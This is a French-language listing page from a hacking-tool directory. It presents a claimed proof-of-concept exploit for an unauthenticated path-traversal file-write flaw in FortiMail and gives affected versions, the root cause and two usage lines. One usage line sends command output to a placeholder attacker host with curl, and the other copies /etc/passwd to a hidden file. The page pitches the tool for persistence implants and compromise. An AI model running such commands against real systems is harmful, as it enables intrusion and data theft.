Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/shadowforge-cyber/cve-2026-104286-poc
Mécanismes de PersistanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHubshadowforge-cyber/cve-2026-104286-poc

CVE-2026-104286-POC

Exploit de traversée de chemin non authentifié pour CVE-2026-104286 dans FortiMail, permettant l'écriture de fichiers arbitraires via des requêtes HTTP/HTTPS forgées pour l'évaluation red team et la persistance.

Voir le dépôt
il y a 1 jourPas encore vérifié
Partager

Exploit de traversée de chemin FortiMail CVE-2026-104286

Aperçu

Exploit avancé d'écriture de fichier arbitraire à distance non authentifié pour CVE-2026-104286 dans FortiMail. Des requêtes HTTP/HTTPS craftées contournent la sanitisation des chemins dans le client web, permettant la création arbitraire de fichiers sur le système d'exploitation sous-jacent. Utilisé pour l'évaluation red team, les implants de persistance et la compromission ciblée des déploiements FortiMail.

Versions affectées

FortiMail 8.0.x (<8.0.2), 7.6.x (<7.6.6), 7.4.x (<7.4.8), 7.2.x (<7.2.9), 7.0.x (<7.0.10)

Cause racine

Limitation incorrecte d'un nom de chemin à un répertoire restreint (CWE-22). Aucune validation des séquences ../ dans les chemins de téléversement de fichiers au sein des gestionnaires de l'API HTTP/HTTPS, permettant une traversée en dehors du répertoire de téléversement prévu.

Utilisation

$ python3 cve-2026-104286.py -u http://target:443 -c "curl -s http://attacker:80/$(id)"
$ python3 cve-2026-104286.py -u http://target:443 -l /etc/passwd -o /var/tmp/.hacked
image

Exploit

Contact pour l'exploit : [email protected]

Télécharger l’outil